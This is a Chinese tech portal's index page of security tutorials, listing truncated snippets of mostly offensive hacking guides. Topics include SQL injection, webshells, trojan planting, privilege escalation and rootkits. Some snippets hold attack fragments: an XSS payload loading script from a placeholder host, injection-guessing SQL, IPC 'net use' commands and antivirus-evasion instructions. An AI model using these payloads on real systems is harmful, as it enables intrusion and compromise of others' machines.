设为首页
收藏本站
设为首页
点击收藏
手机版
手机扫一扫访问
迪恩网络手机版
关注官方公众号
微信扫一扫关注
公众号
忘记密码?
QQ登录
微信登录
登陆
注册
门户
Portal
开源
问答
系统
工作
资讯
论坛
BBS
硬件
编程
漏洞
安全
虚拟化
问答
投稿
文章
帖子
用户
快速发帖
客服电话
点击联系客服
在线时间:8:00-16:00
客服电话
132-9538-2358
电子邮件
[email protected]
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
问题反馈
返回顶部
电脑基础
选购指南
故障排查
笔记本
电脑组装
电视盒子
平板电脑
电脑周边
Python
Java
Node.js
c#
Ruby
JSP
LUA
ASP.NET
VBScript
VB.NET
Perl
Erlang
Scala
Julia
JavaScript
VUE
JQuery
Node.js
TypeScript
AJAX
HTML
CSS
BootStrap
综合其他
经典问答
漏洞分析
CVE漏洞
安全教程
安全设置
杀毒防毒
病毒查杀
脚本攻防
入侵防御
工具使用
加密解密
手机安全
安全其他
Docker
程序员工具箱
1核2G服务器首年99元起
腾讯云新客户专享大礼包
【腾讯云】ElasticSearch
【腾讯云】即时通信特惠99
特惠秒杀1核2G云服务器38
深圳家论坛
生活宝-关注生活,发现美
xstack交流社区
overstack社区
Java代码示例
PHP代码示例
网址转二维码
网址缩短
网址转二维码
网址转二维码
qrcode.16892.net
qrcode.55276.net
qrcode.devdocs.uk
qrcode.mlink.in
qrcode.ogeek.cn
OStack程序员社区-中国程序员成长平台
›
门户
›
安全
安全
RSS
下级分类:
安全教程
安全设置
杀毒防毒
病毒查杀
脚本攻防
入侵防御
工具使用
加密解密
手机安全
安全其他
安全教程
SQL脚本注入的不常见方法总结
大家在是否碰到过这样的站点: 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。。 我来说说他们的文章系统原理:全部文章均 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:17
|
阅读:242
|
回复:0
安全教程
黑客如何利用文件包含漏洞进行网站入侵
一、看见漏洞公告 最近想学习一下文件包含漏洞,在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的,PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php inc ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:17
|
阅读:231
|
回复:0
安全教程
任意组合指令达到免杀
注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push 10 -------其中数字可以任意,注意与下面对应 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:17
|
阅读:253
|
回复:0
安全教程
无聊的Css跨站挂马
以前看过分析家写过一篇文章,介绍跨站脚本的安全隐患,当时只是知道有这样的 问题,也没有仔细阅读,目前此类问题经常在一些安全站点发布,偶刚好看到这样一篇文章 , 抱着知道总比不知道好的想法,翻译整 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:17
|
阅读:252
|
回复:0
安全教程
主流与非主流提权技术大全
一:检测一下网站的服务器是否开了 3389 远程终端 二:检测一下服务是否用了serv-u (还有是什么版本的) 方法 一:复制一个网站 用 3389 登陆器连接一下 (是否成功)能连接了,拿下服务器的机率,提高 30 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:17
|
阅读:258
|
回复:0
安全教程
Microsoft SQL Server SA权限最新入侵方法
在获得SA密码后,往往因为服务器管理者或前人将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:17
|
阅读:293
|
回复:0
安全教程
MYSQL数据库注射精华
鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教. 本文需要有基础的SQL语句知识才可以更好的理解.建议想学习的人多去了解一下SQL语句 和编程语言,知己知彼才能百战百胜. 我不 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:17
|
阅读:284
|
回复:0
安全教程
内网渗透——如何打开突破口
内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破,一个大型的网站,一个大型的公司,一个大型的目标,在外肉,管理员总会千方百计的加强防范和修补漏洞,常规的方法进去几乎是不可能。 内网渗透的 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:275
|
回复:0
安全教程
网站脚本注入检测如何绕过限制
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与号和=号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:260
|
回复:0
安全教程
UPDATE注射的两个基本模式
一.测试环境: OS: Windowsxp sp2 php: php 4.3.10 ( mysql 4.1.9 apache 1.3.33 二.测试数据库结构: -----start--- -- 数据库: `test` -- -- ------------------------------------- ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:237
|
回复:0
安全教程
黑客如何破坏杀毒软件
最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到底是如今的病毒过于厉害,还是杀毒软件的能力有限?今天我们就通过实例来看看是什么 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:233
|
回复:0
安全教程
Mysql BackDoorDoor(图)
Mysql BackDoor是一款针对PHP Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的state函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:238
|
回复:0
安全教程
用Shell做DEAMON后台来控制安全访问
如何做一个后台DEAMON来控制安全访问?这就是贯穿这篇文章的中心概念。 我的控制访问比较特殊,考虑到远程登陆点并非固定,所以无法设定固定IP通过SSH登陆服务器。这样N多IP会通过黑客软件试图破解您的用户名和密 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:222
|
回复:0
安全教程
教你在QQ空间挂马
今天我来跟大家谈论一下关于QQ空间挂马的原理,我试了一下,成功率占80%。 有好多人都问我怎么样才可以做到肉鸡成群,我想了好久,觉得QQ空间挂马可以实现这个。所以我试做了一下, 竟然成功了!~~那我就想大家介 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:236
|
回复:0
安全教程
爆破的一般思路与断点的设置
破 顾名思义就是暴力修改程序的代码来达到破解的目的 当然根据共享软件的注册方式我们可以对症下药 比如说没有注册的软件有功能限制、使用次数限制、使用日期限制等 我们就可以分别对待了!我们只需要解除这 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:224
|
回复:0
安全教程
解析RootKit与反RootKit(图)
Rootkit是一个或者多个用于隐藏、控制一台计算机的工具包,该技术被越来越多地应用于一些恶意软件中。在基于Windows的系统中Rootkit更多地用于隐藏程序或进程,系统被注入Rootkit后就可以在不为用户察觉的情况下进行 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:238
|
回复:0
安全教程
VC 下黑客软件隐蔽程序的手段
一、引言 随着计算机网络的不断发展,黑客技术也日益成为一支不可忽视的技术力量,尽管多数黑客的攻击目标以服务器为主,对大多数的互连网用户的直接危害并不大。但有一类称为特洛伊木马的黑客程序可以通过欺骗等 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:222
|
回复:0
安全教程
PERL铸造多线程 支持中文破解SQL自动注入猜解机
说到SQL注入机,从娃娃针对动网文章的dvTxt.pl到臭要饭的绝世猜解CSC、NB联盟的NBSI,大家也都用过吧? 开天始祖 dvTxt.pl,也不知被改了多少遍,以用于针对各种不同的有SQL注入漏洞的系统,通常《黑防》的一篇《* ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:223
|
回复:0
安全教程
总结所有得肉鸡后的命令
net use $\ipipc$Content$nbsp; /user: 建立IPC空链接 net use $\ipipc$Content$nbsp;密码 /user:用户名 建立IPC非空链接 net use h: $\ipc$Content$nbsp;密码……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:214
|
回复:0
安全教程
通过SQL注入得到WebShell的原理及步骤
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:237
|
回复:0
安全教程
教你成为ASP木马高手
1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为!--#i nclude file=ating.jpg-- 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:219
|
回复:0
安全教程
教你注入下载文件的代码到IE进程然后下载的文件
大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候 后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到) 所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:224
|
回复:0
安全教程
破解数据库下载漏洞
作为脚本漏洞的头号杀手锏数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:230
|
回复:0
安全教程
看黑客怎样汇编创建简单的窗口
理论: Windows 程序中,在写图形用户界面时需要调用大量的标准 Windows Gui 函数。其实这对用户和程序员来说都有好处,对于用户,面对的是同一套标准的窗口,对这些窗口的操作都是一样的,所以使用不同的应用程序 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:248
|
回复:0
安全教程
新的挂马方式-ARP欺骗
网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:238
|
回复:0
安全教程
教你如何手工注入猜解语句
猜解表名: and exists (select * from 表名) 猜解列名: and exists (select 字段 from 表名) UNION法: 联合查询: select name,password,id from user union select user,pwd,uid from 爆指定表名内容: ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:234
|
回复:0
安全教程
扫不出肉鸡的常见原因
扫不出肉鸡有很多的可能!一般有如下的情况! 1.你系统的防火墙,或某些补丁作怪! 2.有些地方是扫不到肉鸡的(是不是和各地的电信有关,暂时还不知道) 3.机子设置有关! 4.扫描的网段没有肉鸡(空IPC的 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:239
|
回复:0
安全教程
许多高手提升权限技巧
当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能否跳转到这个目录,如果行那就最好了,直接下 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:219
|
回复:0
安全教程
教你两句话 动网8.20的后台被拿下
dvbbs8.2漏洞补下载地址: http://bbs.dvbbs.net/dispbbs.asp?boardid=8;Id=1519564 紧急安全补丁0530 dvbbs8.2漏洞的产生 login.asp 这个文件的97行Function Dvbbs_ChkLogin 开始有以下代码: username=trim ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:220
|
回复:0
安全教程
黑客技巧:利用Log备份获取Webshell
dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:217
|
回复:0
安全教程
教你如何用ISAPI_Rewrite做IIS防盗链
“盗链”的定义是:此内容不在自己服务器上,而通过技术手段,绕过别人放广告有利益的最终页,直接在自己的有广告有利益的页面上向最终用户提供此内容。 常常是一些名不见经传的小网站来盗取一些有实力的大网站的地 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:267
|
回复:0
安全教程
浅谈文件捆绑技术方式(图)
随着恶意代码的发展越来越广泛,以及其强大的破坏性和更多样的传播方式,给人们带来更多的危害。叶子在前面的文章中已经跟大家谈过恶意代码的基本概念以及对其的研究分析流程。在本篇文章中叶子将给大家介绍一下恶意 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:211
|
回复:0
安全教程
Unicode的消息介绍(图)
基本知识 字节和字符的区别 Big Endian和Little Endian UCS-2和UCS-4 UTF-16和UTF-32 UTF-16 UTF-32 UTF-8 基本知识 介绍Unicode之前,首先要讲解一些基础知识。虽然跟Unicode没有直接的关系, ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:223
|
回复:0
安全教程
Rootkit隐形技术教程(图)
一、综述 本文将引领读者打造一个初级的内核级Rootkit,然后为其引入两种简单的隐形技术:进程隐形技术和文件隐形技术。同时,为了让读者获得rootkit编程的相关经验,我们顺便介绍了rootkit的装载、卸载方法,以 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:210
|
回复:0
安全教程
用ASP脚本命令重启服务器
家知道直接使用ASP是不能够重启服务器的,这时我们需要制作一个组件来实现功能,ASP通过这个组件调用系统API,然后按照不同的重启和关机方式进行操作! 下面先说COM的制作,在VB中新建一工程,当然是Aceiv ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:210
|
回复:0
安全教程
后门程序技术知识深解
后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会感染其他电脑。 后门是一种登 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:219
|
回复:0
安全教程
DNS欺骗技术教程
定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了, ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:214
|
回复:0
安全教程
教你如何在XSS中再插JS
img src=javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}/img 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前: img src='#' X ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:217
|
回复:0
安全教程
黑客域名劫持攻击的基本步骤
近期发现adobe.com,internet.com,nike.com,等等著名站点都分分遭受到攻击,但攻击者所使用的技术并不是以往所使用的入侵WEB服务器,更改主页的惯用手法,攻击者使用的是一种域名劫持攻击?攻击者通过冒充原域名拥有 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:215
|
回复:0
安全教程
黑客狙击Oracle系统的八大常用方法
Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的,耍嘴皮子容易,兑现起来可就不那么容易了。不管什么计算机系统,人们总能够找到攻击它的方法,Oracle也不例外。本文将和大家从黑客的角度讨论黑客是 ...……
作者:菜鸟教程小白
|
时间:2022-2-6 13:16
|
阅读:214
|
回复:0
1 ...
179
180
181
182
183
184
185
186
... 194
/ 194 页
下一页
关注我们
极客给你想要的成长
关注极客中国获取最新资讯
加入Q群
官方微博
热门
推荐
More+
专题
导读
More+
10-27
六六分期app的软件客服如何联系?(六六分期
admin
In
资讯
11-06
可心卡盟:win10系统火狐flash插件崩溃怎么
菜鸟教程小白
In
资讯
11-06
亲亲特价:怎么删除回收站图标
菜鸟教程小白
In
资讯
11-06
济南大学虚拟社区:鲁大师节能降温的具体办
菜鸟教程小白
In
资讯
11-06
xlueops.exe:无线网络安装向导
菜鸟教程小白
In
资讯
11-06
女斗合众国:win7系统cf与主机连接不稳定怎
菜鸟教程小白
In
资讯
热门
话题
More+
阅读
排行榜
返回顶部